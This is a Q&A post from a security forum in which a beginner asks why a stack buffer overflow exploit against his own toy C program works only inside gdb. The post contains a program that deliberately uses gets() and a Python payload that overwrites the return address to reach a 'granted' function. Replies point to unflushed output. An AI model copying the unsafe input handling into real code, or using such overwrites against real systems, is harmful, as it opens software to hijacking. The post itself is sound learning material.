7

tl;dr: Why my exploit only works inside gdb.

I'm very new to the buffer overflow and exploit development fields. To improve my skills based on a serie of papers and videos I wrote this simple C software:

Note: I disabled ASLR

I believe that my question is different than this: Buffer overflow exploit works with gdb but not without because the author seems to have ASRL enabled. 

#include <stdio.h>
#include <string.h>

void granted()
{
    printf ("\nAccess granted\n");
    return;
}

int main()
{
    char password[104];
    printf ("Enter your password: ");
    gets(password);

    if (strcmp(password,"p@$$w0rd"))
    {
        printf("\nFailed!!");
    }
    else
    {
        granted();
    }

}

As far as I know there is a little bug: it is possible to enter much more than 103 chars.

My first exploit objectives were to redirect the execution flow to the granted function.

To generate the exploit, I used the following command python -c 'print "A"*100+"\x9b\x84\x04\x08"+"BBBB"' > payload-access-granted

me@computer:~$ gdb bof3.bin 
(gdb) r < payload-access-granted 
Starting program: /home/me/bof3.bin < payload-access-granted
Enter your password: 
Failed!!
Access granted

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

As you can see the payload did what was expected: Jumped to the granted function. Exploit is working...but

Outside gdb: 

me@computer:~$ ./bof3.bin < payload-access-granted 
Enter your password: 
Segmentation fault (core dumped)

So, why does this occur? What didn't I do correctly?

mcgyver5
  • 6,807
  • 2
  • 24
  • 45
Joao Daniel
  • 101
  • 3
  • What arguments and options did you use to compile the source .c to bof3.bin? Please include all libraries loaded by gdb. Is it possible you have more than one copy of bofe.bin in different directories? – this.josh Apr 20 '17 at 05:43
  • Is `0x0804849b` address of granted()? – gtux Apr 20 '17 at 09:57
  • What operating system are you running this on? I can't get your code to break. How did you compile the binary, can you provide the gcc line? – RoraΖ Apr 20 '17 at 18:03
  • This is not a duplicate question, IMHO. NOP sled will not work here since, there is no shellcode insertion done. OP is trying to jump to an address in text section, hence, no need for a nop sled to guess the address. – gtux Apr 25 '17 at 06:48
  • Loading the dumped core into gdb will show you why. Possibly it is merely due to it segfaulting on 0x42424242 before the access granted string is flushed to screen. – wireghoul Jul 15 '17 at 04:36

1 Answers1

2

Most likely, it is working, but the program crashes with the Access Granted printf not having been flushed to the screen. Crashing on SIGSEGV does not cause buffers to be flushed. Add fflush(stdout); after the printf call in granted, and you'll likely get your desired behavior.

David
  • 15,814
  • 3
  • 48
  • 73